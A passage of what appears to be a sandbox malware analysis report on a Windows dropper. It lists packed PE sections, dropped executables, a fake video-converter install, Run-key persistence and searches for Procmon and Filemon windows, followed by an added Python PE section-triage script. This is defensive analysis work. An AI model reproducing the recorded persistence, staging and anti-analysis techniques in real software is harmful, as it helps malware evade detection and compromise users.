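A stored checksum of 0x0 is simply unset and is common for unsigned builds (most of the Inno Setup .tmp files above); the rows worth attention are the non-zero mismatches such as AApUa7VQiy.exe's, which mean the image was rewritten after the linker filled the header. The /4, /19 names on sqlite3.dll are COFF long-name references produced by GNU binutils and are kept out of the blank/nonstandard findings so they do not inflate the verdict on an ordinary MinGW build.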
                            Source: AApUa7VQiy.exe | Static PE information: section names: (blank), .idata, (blank), litpxdqa, jzjfpldr, .taggant
                            Source: ES0PERDCSSGNQK1XTMK282189FFMR8.exe.0.dr | Static PE information: section names: (blank), .idata, (blank), bzipjhra, iworeitq, .taggant
                            Source: BEB973FPO2R62ZWABVOVP8TC.exe.0.dr | Static PE information: section names: (blank), .idata, fwrotwuw, wyiambmx, .taggant
                            Source: skotes.exe.6.dr | Static PE information: section names: (blank), .idata, fwrotwuw, wyiambmx, .taggant
                            Source: random[2].exe.9.dr | Static PE information: section names: (blank), .idata, stadzsnm, tsmjrbki, .taggant
                            Source: 62950fb3a8.exe.9.dr | Static PE information: section names: (blank), .idata, stadzsnm, tsmjrbki, .taggant
                            Source: random[4].exe.9.dr | Static PE information: section names: (blank), .idata, (blank), zqjesnms, itcibofp, .taggant
                            Source: 072d564b60.exe.9.dr | Static PE information: section names: (blank), .idata, (blank), zqjesnms, itcibofp, .taggant
                            Source: random[3].exe0.9.dr | Static PE information: section names: (blank), .idata, (blank), gopdotwy, wozfuuqk, .taggant
                            Source: d37c6a3c82.exe.9.dr | Static PE information: section names: (blank), .idata, (blank), gopdotwy, wozfuuqk, .taggant
                            Source: random[2].exe0.9.dr | Static PE information: section names: (blank), .idata, (blank), bzipjhra, iworeitq, .taggant
                            Source: 513076b4b2.exe.9.dr | Static PE information: section names: (blank), .idata, (blank), bzipjhra, iworeitq, .taggant
                            Source: ktIplF5[1].exe.9.dr | Static PE information: section names: (blank), .idata, (blank), mzomafvq, rxmgvynz, .taggant
                            Source: ktIplF5.exe.9.dr | Static PE information: section names: (blank), .idata, (blank), mzomafvq, rxmgvynz, .taggant
                            Source: random[1].exe1.9.dr | Static PE information: section names: (blank), .idata, (blank), jxlmjtji, pjewfnhk, .taggant
                            Source: df1b740bf8.exe.9.dr | Static PE information: section names: (blank), .idata, (blank), jxlmjtji, pjewfnhk, .taggant
                            Source: is-B6V2L.tmp.11.dr | Static PE information: section names: /4, /19, /35, /51, /63, /77, /89, /102, /113, /124
                            Source: sqlite3.dll.12.dr | Static PE information: section names: /4, /19, /35, /51, /63, /77, /89, /102, /113, /124
                            Source: is-M72JG.tmp.34.drStatic PE information: section name: .xdata
                            Source: is-M72JG.tmp.34.drStatic PE information: section name: /4
                            Source: is-M72JG.tmp.34.drStatic PE information: section name: /19
                            Source: is-M72JG.tmp.34.drStatic PE information: section name: /35
                            Source: is-M72JG.tmp.34.drStatic PE information: section name: /47
                            Source: is-M72JG.tmp.34.drStatic PE information: section name: /61
                            Source: is-M72JG.tmp.34.drStatic PE information: section name: /73
                            Source: is-M72JG.tmp.34.drStatic PE information: section name: /86
                            Source: is-M72JG.tmp.34.drStatic PE information: section name: /97
                            Source: is-M72JG.tmp.34.drStatic PE information: section name: /113
                            Source: is-M72JG.tmp.34.drStatic PE information: section name: /127
                            Source: is-M72JG.tmp.34.drStatic PE information: section name: /143
                            Source: is-M72JG.tmp.34.drStatic PE information: section name: /159
                            Source: C:\Users\user\Desktop\AApUa7VQiy.exeCode function: 0_3_014AA5F4 pushad ; ret 0_3_014AA5F5
                            Source: C:\Users\user\Desktop\AApUa7VQiy.exeCode function: 0_3_014B0399 push ss; ret 0_3_014B039A
                            Source: C:\Users\user\Desktop\AApUa7VQiy.exeCode function: 0_3_0145C384 pushfd ; ret 0_3_0145C385
                            Source: C:\Users\user\AppData\Local\Temp\BEB973FPO2R62ZWABVOVP8TC.exeCode function: 6_2_00B1D91C push ecx; ret 6_2_00B1D92F
                            Source: C:\Users\user\AppData\Local\Temp\BEB973FPO2R62ZWABVOVP8TC.exeCode function: 6_2_00B11359 push es; ret 6_2_00B1135A
                            Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeCode function: 7_2_0003D91C push ecx; ret 7_2_0003D92F
                            Source: AApUa7VQiy.exeStatic PE information: section name: entropy: 7.979872824347602
                            Source: AApUa7VQiy.exeStatic PE information: section name: litpxdqa entropy: 7.95346190111974
                            Source: ES0PERDCSSGNQK1XTMK282189FFMR8.exe.0.drStatic PE information: section name: bzipjhra entropy: 7.95452541615898
                            Source: BEB973FPO2R62ZWABVOVP8TC.exe.0.drStatic PE information: section name: entropy: 7.981797773656524
                            Source: skotes.exe.6.drStatic PE information: section name: entropy: 7.981797773656524
                            Source: random[4].exe.9.drStatic PE information: section name: entropy: 7.98292861859206
                            Source: random[4].exe.9.drStatic PE information: section name: zqjesnms entropy: 7.952975372450472
                            Source: 072d564b60.exe.9.drStatic PE information: section name: entropy: 7.98292861859206
                            Source: 072d564b60.exe.9.drStatic PE information: section name: zqjesnms entropy: 7.952975372450472
                            Source: random[3].exe0.9.drStatic PE information: section name: entropy: 7.98364611125624
                            Source: random[3].exe0.9.drStatic PE information: section name: gopdotwy entropy: 7.953887577655385
                            Source: d37c6a3c82.exe.9.drStatic PE information: section name: entropy: 7.98364611125624
                            Source: d37c6a3c82.exe.9.drStatic PE information: section name: gopdotwy entropy: 7.953887577655385
                            Source: random[2].exe0.9.drStatic PE information: section name: bzipjhra entropy: 7.95452541615898
                            Source: 513076b4b2.exe.9.drStatic PE information: section name: bzipjhra entropy: 7.95452541615898
                            Source: ktIplF5[1].exe.9.drStatic PE information: section name: entropy: 7.971954723173139
                            Source: ktIplF5[1].exe.9.drStatic PE information: section name: mzomafvq entropy: 7.954155998647114
                            Source: ktIplF5.exe.9.drStatic PE information: section name: entropy: 7.971954723173139
                            Source: ktIplF5.exe.9.drStatic PE information: section name: mzomafvq entropy: 7.954155998647114
                            Source: random[1].exe1.9.drStatic PE information: section name: entropy: 7.976929850931208
                            Source: random[1].exe1.9.drStatic PE information: section name: jxlmjtji entropy: 7.953783368763905
                            Source: df1b740bf8.exe.9.drStatic PE information: section name: entropy: 7.976929850931208
                            Source: df1b740bf8.exe.9.drStatic PE information: section name: jxlmjtji entropy: 7.953783368763905
                            Source: is-F3L00.tmp.11.drStatic PE information: section name: .text entropy: 6.90903234258047
                            Source: random[2].exe2.9.dr, aNQaxxDiYjXg.csHigh entropy of concatenated method names: 'MsYIiHCKOVg', 'AEIcapmlYwreYrwbho', 'grtEQPnEWQeGyOSsVquAnysLp', 'pxnOSxlzAtLoJePZLWYzXO', 'IbsfQgxrfqgPuy', 'ztQvAnOyfhhCblhxUz', 'dxdlOMPOTTnPkakgWUGEGfztEkAq', 'OAifdjgfkNwmDDXqVnAD', 'TLJetgkhOgLr', 'drEVxryILBScHeTHJfUUrx'
                            Source: random[2].exe2.9.dr, uBQRQemRwragayxWIgNspKbnCcaXv.csHigh entropy of concatenated method names: 'IjUmeHhCBOyXrjvVvfONTPF', 'jPPhvaEdyPCFnNAkJlNs', 'BeQPfkZSpjPvYqqBenLtJZo', 'CYawTJzZuySnyVztOHTAHtpzd', 'JjaSPmSzbwZLvheEztVywB', 'AQYdCEVeAxZE', 'ahfneZThAlkikgxqxo', 'YMclrJgYWZTZSKJJSQaYw', 'vJnhTmqycRrvnmNN', 'bxqWmohFigqxoF'
                            Source: 4ee3234999.exe.9.dr, aNQaxxDiYjXg.csHigh entropy of concatenated method names: 'MsYIiHCKOVg', 'AEIcapmlYwreYrwbho', 'grtEQPnEWQeGyOSsVquAnysLp', 'pxnOSxlzAtLoJePZLWYzXO', 'IbsfQgxrfqgPuy', 'ztQvAnOyfhhCblhxUz', 'dxdlOMPOTTnPkakgWUGEGfztEkAq', 'OAifdjgfkNwmDDXqVnAD', 'TLJetgkhOgLr', 'drEVxryILBScHeTHJfUUrx'
                            Source: 4ee3234999.exe.9.dr, uBQRQemRwragayxWIgNspKbnCcaXv.csHigh entropy of concatenated method names: 'IjUmeHhCBOyXrjvVvfONTPF', 'jPPhvaEdyPCFnNAkJlNs', 'BeQPfkZSpjPvYqqBenLtJZo', 'CYawTJzZuySnyVztOHTAHtpzd', 'JjaSPmSzbwZLvheEztVywB', 'AQYdCEVeAxZE', 'ahfneZThAlkikgxqxo', 'YMclrJgYWZTZSKJJSQaYw', 'vJnhTmqycRrvnmNN', 'bxqWmohFigqxoF'
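The section rows above are the raw static observations behind three of the report's signatures: sections with empty or unprintable names, 8-character random lowercase names such as mzomafvq and jxlmjtji at entropy 7.95 and above, and a writeable .text section. The following Python is an added example, not part of the Joe Sandbox report, that walks a PE section table with nothing but struct and reproduces those checks. The PE it parses is constructed inline and is not one of the samples above; the 7.0 entropy cutoff and the set of "known" section names are assumptions chosen for the example.

```python
import hashlib
import math
import struct
from dataclasses import dataclass

# Names a linker normally emits; .taggant is the TAGGANT marker some packers append.
# The set is an assumption for this example, extend it for your own tooling.
KNOWN_SECTION_NAMES = {
    ".text", ".rdata", ".data", ".idata", ".edata", ".rsrc", ".reloc",
    ".bss", ".tls", ".pdata", ".xdata", ".CRT", ".taggant",
}
IMAGE_SCN_MEM_EXECUTE = 0x20000000
IMAGE_SCN_MEM_WRITE = 0x80000000
SECTION_HEADER = "<8sIIIIIIHHI"  # IMAGE_SECTION_HEADER, 40 bytes


@dataclass
class Section:
    name: str
    raw_offset: int
    raw_size: int
    characteristics: int
    entropy: float


def shannon_entropy(data: bytes) -> float:
    """Bits per byte: 0.0 for empty or constant data, close to 8.0 for packed or encrypted bytes."""
    if not data:
        return 0.0
    counts = [0] * 256
    for b in data:
        counts[b] += 1
    n = len(data)
    return -sum(c / n * math.log2(c / n) for c in counts if c)


def parse_sections(pe: bytes) -> list[Section]:
    """DOS header -> e_lfanew -> 'PE\\0\\0' -> COFF header -> section table."""
    if pe[:2] != b"MZ":
        raise ValueError("not an MZ image")
    (e_lfanew,) = struct.unpack_from("<I", pe, 0x3C)
    if pe[e_lfanew:e_lfanew + 4] != b"PE\0\0":
        raise ValueError("PE signature not found")
    coff = e_lfanew + 4
    (n_sections,) = struct.unpack_from("<H", pe, coff + 2)
    (opt_size,) = struct.unpack_from("<H", pe, coff + 16)
    table = coff + 20 + opt_size
    sections = []
    for i in range(n_sections):
        fields = struct.unpack_from(SECTION_HEADER, pe, table + i * 40)
        raw_name, _, _, raw_size, raw_ptr, _, _, _, _, chars = fields
        name = raw_name.rstrip(b"\0").decode("ascii", "replace")
        raw = pe[raw_ptr:raw_ptr + raw_size]   # entropy over the raw on-disk bytes, as the report does
        sections.append(Section(name, raw_ptr, raw_size, chars, shannon_entropy(raw)))
    return sections


def triage(sections: list[Section], entropy_threshold: float = 7.0) -> list[tuple[str, str]]:
    """The three static checks from the report, as (section name, reason) pairs."""
    findings = []
    for s in sections:
        if not s.name or not s.name.isprintable():
            findings.append((s.name, "empty/non-printable section name"))
        elif s.name not in KNOWN_SECTION_NAMES:
            findings.append((s.name, "non-standard section name"))
        if s.entropy >= entropy_threshold:
            findings.append((s.name, f"high entropy {s.entropy:.2f}"))
        if s.characteristics & IMAGE_SCN_MEM_EXECUTE and s.characteristics & IMAGE_SCN_MEM_WRITE:
            findings.append((s.name, "writable and executable"))
    return findings


def build_sample_pe() -> bytes:
    """Constructed four-section PE for the demo; not one of the report's samples."""
    packed = b"".join(hashlib.sha256(i.to_bytes(4, "little")).digest() for i in range(512))  # 16 KiB pseudo-random
    code = b"\x55\x8b\xec\x90\xc3" * 200                # repetitive, low entropy
    tag = b"TAGG" * 16
    entries = [
        (b".text", code, 0xE0000020),      # CODE|EXEC|READ|WRITE: the writeable .text case
        (b"mzomafvq", packed, 0xE0000040), # random name carrying a packed payload
        (b"\x01\x02", tag, 0x40000040),    # unprintable section name
        (b".taggant", tag, 0x40000040),    # known name, benign
    ]
    dos = b"MZ" + b"\0" * 58 + struct.pack("<I", 0x40)                       # e_lfanew = 0x40
    coff = struct.pack("<HHIIIHH", 0x14C, len(entries), 0, 0, 0, 0, 0x0102)  # SizeOfOptionalHeader = 0
    headers, blobs, ptr, va = b"", b"", 0x200, 0x1000
    for name, blob, chars in entries:
        size = (len(blob) + 0x1FF) & ~0x1FF                                   # 0x200 file alignment
        headers += struct.pack(SECTION_HEADER, name.ljust(8, b"\0"), len(blob), va, size, ptr, 0, 0, 0, 0, chars)
        blobs += blob.ljust(size, b"\0")
        ptr, va = ptr + size, va + 0x1000
    return (dos + b"PE\0\0" + coff + headers).ljust(0x200, b"\0") + blobs


if __name__ == "__main__":
    for name, reason in triage(parse_sections(build_sample_pe())):
        print(f"{name!r}: {reason}")
```

Run it and the constructed .text section is reported as writable and executable, mzomafvq as a non-standard name with entropy near 7.99, and the \x01\x02 section as unprintable, while .taggant is silent. The report's own numbers show why a cutoff near 7.0 is workable here: every packed section lands between 7.95 and 7.98, whereas the ordinary .text of is-F3L00.tmp sits at 6.91, so a section that is both randomly named and above the cutoff is a much stronger signal than either trait alone.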

Persistence and Installation Behavior

Source: C:\Windows\SysWOW64\cmd.exe | File created: C:\Users\user\AppData\Local\Temp\36469\Avoiding.com
Source: C:\Windows\SysWOW64\cmd.exe | File created: C:\Users\user\AppData\Local\Temp\764661\Macromedia.com
Source: C:\Users\user\AppData\Local\Temp\764661\Macromedia.com | File created: C:\Users\user\AppData\Local\GuardTech Solutions\AchillesGuard.com
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe | File created: C:\Users\user\AppData\Local\Temp\1062128101\9673a0a47c.exe
Source: C:\Users\user\AppData\Local\Temp\is-D39IS.tmp\infinity.tmp | File created: C:\Users\user\AppData\Local\Flv to AVI Converter 10.6.0.2004 Free\icuuc51.dll (copy)
Source: C:\Users\user\AppData\Local\Temp\is-D39IS.tmp\infinity.tmp | File created: C:\Users\user\AppData\Local\Flv to AVI Converter 10.6.0.2004 Free\libGLESv2.dll (copy)
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe | File created: C:\Users\user\AppData\Local\Temp\1062121001\179187318e.exe
Source: C:\Users\user\AppData\Local\Temp\is-D39IS.tmp\infinity.tmp | File created: C:\Users\user\AppData\Local\Flv to AVI Converter 10.6.0.2004 Free\uninstall\is-2E87P.tmp
Source: C:\Users\user\AppData\Local\Temp\is-D39IS.tmp\infinity.tmp | File created: C:\Users\user\AppData\Local\Flv to AVI Converter 10.6.0.2004 Free\msvcr100.dll (copy)
Source: C:\Users\user\AppData\Local\Temp\is-D39IS.tmp\infinity.tmp | File created: C:\Users\user\AppData\Local\Flv to AVI Converter 10.6.0.2004 Free\is-TBCD3.tmp
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe | File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\W9FILL1W\random[2].exe
Source: C:\Users\user\AppData\Local\Temp\is-QC3FO.tmp\f46bdbcca4.tmp | File created: C:\Users\user\AppData\Local\Temp\is-H9QGA.tmp\_isetup\_isdecmp.dll
Source: C:\Users\user\AppData\Local\Temp\is-45ARK.tmp\f46bdbcca4.tmp | File created: C:\Users\user\AppData\Local\Temp\is-9ADV0.tmp\_isetup\_isdecmp.dll
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe | File created: C:\Users\user\AppData\Local\Temp\1062131001\d37c6a3c82.exe
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe | File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9H3TYFD3\random[3].exe
Source: C:\Users\user\AppData\Local\Temp\is-D39IS.tmp\infinity.tmp | File created: C:\Users\user\AppData\Local\Flv to AVI Converter 10.6.0.2004 Free\Qt5PrintSupport.dll (copy)
Source: C:\Users\user\AppData\Local\Temp\764661\Macromedia.com | File created: C:\Users\user\AppData\Local\GuardTech Solutions\AchillesGuard.com
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe | File created: C:\Users\user\AppData\Local\Temp\1062123001\f46bdbcca4.exe
Source: C:\Users\user\AppData\Local\Temp\is-D39IS.tmp\infinity.tmp | File created: C:\Users\user\AppData\Local\Flv to AVI Converter 10.6.0.2004 Free\icuin51.dll (copy)
Source: C:\Users\user\AppData\Local\Temp\BEB973FPO2R62ZWABVOVP8TC.exe | File created: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe | File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\W9FILL1W\random[1].exe
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe | File created: C:\Users\user\AppData\Local\Temp\1062132001\513076b4b2.exe
Source: C:\Users\user\AppData\Local\Temp\is-D39IS.tmp\infinity.tmp | File created: C:\Users\user\AppData\Local\Temp\is-7NP9I.tmp\_isetup\_setup64.tmp
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe | File created: C:\Users\user\AppData\Local\Temp\1062126001\a6c5834e2f.exe
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe | File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\B8DE7T9Q\random[2].exe
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe | File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\DQNVS06W\random[1].exe
Source: C:\Users\user\AppData\Local\Temp\is-D39IS.tmp\infinity.tmp | File created: C:\Users\user\AppData\Local\Flv to AVI Converter 10.6.0.2004 Free\is-B6V2L.tmp
Source: C:\Users\user\AppData\Local\Temp\is-D39IS.tmp\infinity.tmp | File created: C:\Users\user\AppData\Local\Flv to AVI Converter 10.6.0.2004 Free\is-F3L00.tmp
Source: C:\Users\user\AppData\Local\Temp\is-D39IS.tmp\infinity.tmp | File created: C:\Users\user\AppData\Local\Temp\is-7NP9I.tmp\_isetup\_shfoldr.dll
Source: C:\Users\user\AppData\Local\Temp\is-D39IS.tmp\infinity.tmp | File created: C:\Users\user\AppData\Local\Flv to AVI Converter 10.6.0.2004 Free\is-SOSP7.tmp
Source: C:\Users\user\AppData\Local\Temp\is-D39IS.tmp\infinity.tmp | File created: C:\Users\user\AppData\Local\Flv to AVI Converter 10.6.0.2004 Free\is-2RO6E.tmp
Source: C:\Users\user\AppData\Local\Temp\is-D39IS.tmp\infinity.tmp | File created: C:\Users\user\AppData\Local\Flv to AVI Converter 10.6.0.2004 Free\Qt5Concurrent.dll (copy)
Source: C:\Users\user\AppData\Local\Temp\is-D39IS.tmp\infinity.tmp | File created: C:\Users\user\AppData\Local\Flv to AVI Converter 10.6.0.2004 Free\libEGL.dll (copy)
Source: C:\Users\user\AppData\Local\Temp\is-QC3FO.tmp\f46bdbcca4.tmp | File created: C:\Users\user\AppData\Local\Temp\is-H9QGA.tmp\_isetup\_setup64.tmp
Source: C:\Users\user\Desktop\AApUa7VQiy.exe | File created: C:\Users\user\AppData\Local\Temp\ES0PERDCSSGNQK1XTMK282189FFMR8.exe
Source: C:\Users\user\AppData\Local\Temp\is-45ARK.tmp\f46bdbcca4.tmp | File created: C:\Users\user\AppData\Local\unins000.exe (copy)
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe | File created: C:\Users\user\AppData\Local\Temp\1062130001\072d564b60.exe
Source: C:\Users\user\AppData\Local\Temp\is-D39IS.tmp\infinity.tmp | File created: C:\Users\user\AppData\Local\Temp\is-7NP9I.tmp\_isetup\_iscrypt.dll
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe | File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\DQNVS06W\random[3].exe
Source: C:\Users\user\Desktop\AApUa7VQiy.exe | File created: C:\Users\user\AppData\Local\Temp\BEB973FPO2R62ZWABVOVP8TC.exe
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe | File created: C:\Users\user\AppData\Local\Temp\1062125001\4ee3234999.exe
Source: C:\Users\user\AppData\Local\Temp\1061683001\infinity.exe | File created: C:\Users\user\AppData\Local\Temp\is-D39IS.tmp\infinity.tmp
Source: C:\Users\user\AppData\Local\Temp\is-D39IS.tmp\infinity.tmp | File created: C:\Users\user\AppData\Local\Flv to AVI Converter 10.6.0.2004 Free\is-LC5T3.tmp
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe | File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9H3TYFD3\ktIplF5[1].exe
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe | File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9H3TYFD3\random[1].exe
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe | File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\W9FILL1W\random[3].exe
Source: C:\Users\user\AppData\Local\Temp\is-45ARK.tmp\f46bdbcca4.tmp | File created: C:\Users\user\AppData\Local\Temp\is-9ADV0.tmp\_isetup\_shfoldr.dll
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe | File created: C:\Users\user\AppData\Local\Temp\1062122001\df1b740bf8.exe
Source: C:\Users\user\AppData\Local\Temp\is-D39IS.tmp\infinity.tmp | File created: C:\Users\user\AppData\Local\Flv to AVI Converter 10.6.0.2004 Free\is-S5638.tmp
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe | File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\DQNVS06W\infinity[1].exe
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe | File created: C:\Users\user\AppData\Local\Temp\1062133001\6299d9e5a5.exe
Source: C:\Windows\SysWOW64\cmd.exe | File created: C:\Users\user\AppData\Local\Temp\36469\Avoiding.com
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe | File created: C:\Users\user\AppData\Local\Temp\1062124001\61f0c6628c.exe
Source: C:\Users\user\AppData\Local\Temp\is-45ARK.tmp\f46bdbcca4.tmp | File created: C:\Users\user\AppData\Roaming\uxtheme_2.drv (copy)
Source: C:\Users\user\AppData\Local\Temp\is-45ARK.tmp\f46bdbcca4.tmp | File created: C:\Users\user\AppData\Roaming\is-M72JG.tmp
Source: C:\Users\user\AppData\Local\Temp\is-D39IS.tmp\infinity.tmp | File created: C:\Users\user\AppData\Local\Flv to AVI Converter 10.6.0.2004 Free\msvcp100.dll (copy)
Source: C:\Users\user\AppData\Local\Temp\is-45ARK.tmp\f46bdbcca4.tmp | File created: C:\Users\user\AppData\Local\Temp\is-9ADV0.tmp\_isetup\_setup64.tmp
Source: C:\Users\user\AppData\Local\Temp\is-D39IS.tmp\infinity.tmp | File created: C:\Users\user\AppData\Local\Flv to AVI Converter 10.6.0.2004 Free\flv2aviconverter24.exe
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe | File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\W9FILL1W\random[4].exe
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe | File created: C:\Users\user\AppData\Local\Temp\1062048001\ktIplF5.exe
Source: C:\Users\user\AppData\Local\Flv to AVI Converter 10.6.0.2004 Free\flv2aviconverter24.exe | File created: C:\ProgramData\Flv2AVIConverter\Flv2AVIConverter.exe
Source: C:\Users\user\AppData\Local\Flv to AVI Converter 10.6.0.2004 Free\flv2aviconverter24.exe | File created: C:\ProgramData\Flv2AVIConverter\sqlite3.dll
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe | File created: C:\Users\user\AppData\Local\Temp\1061683001\infinity.exe
Source: C:\Windows\SysWOW64\cmd.exe | File created: C:\Users\user\AppData\Local\Temp\764661\Macromedia.com
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe | File created: C:\Users\user\AppData\Local\Temp\1062127001\62950fb3a8.exe
Source: C:\Users\user\AppData\Local\Temp\is-D39IS.tmp\infinity.tmp | File created: C:\Users\user\AppData\Local\Flv to AVI Converter 10.6.0.2004 Free\is-CAFKN.tmp
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe | File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9H3TYFD3\random[2].exe
Source: C:\Users\user\AppData\Local\Temp\1062123001\f46bdbcca4.exe | File created: C:\Users\user\AppData\Local\Temp\is-QC3FO.tmp\f46bdbcca4.tmp
Source: C:\Users\user\AppData\Local\Temp\is-QC3FO.tmp\f46bdbcca4.tmp | File created: C:\Users\user\AppData\Local\Temp\is-H9QGA.tmp\_isetup\_shfoldr.dll
Source: C:\Users\user\AppData\Local\Temp\is-45ARK.tmp\f46bdbcca4.tmp | File created: C:\Users\user\AppData\Local\is-0DEO7.tmp
Source: C:\Users\user\AppData\Local\Temp\1062123001\f46bdbcca4.exe | File created: C:\Users\user\AppData\Local\Temp\is-45ARK.tmp\f46bdbcca4.tmp
Source: C:\Users\user\AppData\Local\Temp\is-D39IS.tmp\infinity.tmp | File created: C:\Users\user\AppData\Local\Flv to AVI Converter 10.6.0.2004 Free\is-PJU74.tmp
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe | File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\DQNVS06W\random[2].exe
Source: C:\Users\user\AppData\Local\Temp\is-D39IS.tmp\infinity.tmp | File created: C:\Users\user\AppData\Local\Flv to AVI Converter 10.6.0.2004 Free\sqlite3.dll (copy)
Source: C:\Users\user\AppData\Local\Temp\is-D39IS.tmp\infinity.tmp | File created: C:\Users\user\AppData\Local\Flv to AVI Converter 10.6.0.2004 Free\uninstall\unins000.exe (copy)
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe | File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\B8DE7T9Q\random[1].exe
Source: C:\Users\user\AppData\Local\Flv to AVI Converter 10.6.0.2004 Free\flv2aviconverter24.exe | File created: C:\ProgramData\Flv2AVIConverter\Flv2AVIConverter.exe
Source: C:\Users\user\AppData\Local\Flv to AVI Converter 10.6.0.2004 Free\flv2aviconverter24.exe | File created: C:\ProgramData\Flv2AVIConverter\sqlite3.dll

Boot Survival

Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe | Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run am_no.cmd
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe | Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run 9673a0a47c.exe
Source: C:\Users\user\Desktop\AApUa7VQiy.exe | Window searched: window name: FilemonClass
Source: C:\Users\user\Desktop\AApUa7VQiy.exe | Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\Desktop\AApUa7VQiy.exe | Window searched: window name: RegmonClass
Source: C:\Users\user\Desktop\AApUa7VQiy.exe | Window searched: window name: FilemonClass
Source: C:\Users\user\Desktop\AApUa7VQiy.exe | Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\Desktop\AApUa7VQiy.exe | Window searched: window name: Regmonclass
Source: C:\Users\user\Desktop\AApUa7VQiy.exe | Window searched: window name: Filemonclass
Source: C:\Users\user\Desktop\AApUa7VQiy.exe | Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\Desktop\AApUa7VQiy.exe | Window searched: window name: Regmonclass
Source: C:\Users\user\AppData\Local\Temp\ES0PERDCSSGNQK1XTMK282189FFMR8.exe | Window searched: window name: FilemonClass
Source: C:\Users\user\AppData\Local\Temp\ES0PERDCSSGNQK1XTMK282189FFMR8.exe | Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\AppData\Local\Temp\ES0PERDCSSGNQK1XTMK282189FFMR8.exe | Window searched: window name: RegmonClass
Source: C:\Users\user\AppData\Local\Temp\ES0PERDCSSGNQK1XTMK282189FFMR8.exe | Window searched: window name: FilemonClass
Source: C:\Users\user\AppData\Local\Temp\ES0PERDCSSGNQK1XTMK282189FFMR8.exe | Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\AppData\Local\Temp\BEB973FPO2R62ZWABVOVP8TC.exe | Window searched: window name: FilemonClass
Source: C:\Users\user\AppData\Local\Temp\BEB973FPO2R62ZWABVOVP8TC.exe | Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\AppData\Local\Temp\BEB973FPO2R62ZWABVOVP8TC.exe | Window searched: window name: RegmonClass
Source: C:\Users\user\AppData\Local\Temp\BEB973FPO2R62ZWABVOVP8TC.exe | Window searched: window name: FilemonClass
Source: C:\Users\user\AppData\Local\Temp\BEB973FPO2R62ZWABVOVP8TC.exe | Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe | Window searched: window name: FilemonClass
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe | Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe | Window searched: window name: RegmonClass
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe | Window searched: window name: FilemonClass
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe | Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe | Window searched: window name: FilemonClass
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe | Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe | Window searched: window name: RegmonClass
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe | Window searched: window name: FilemonClass
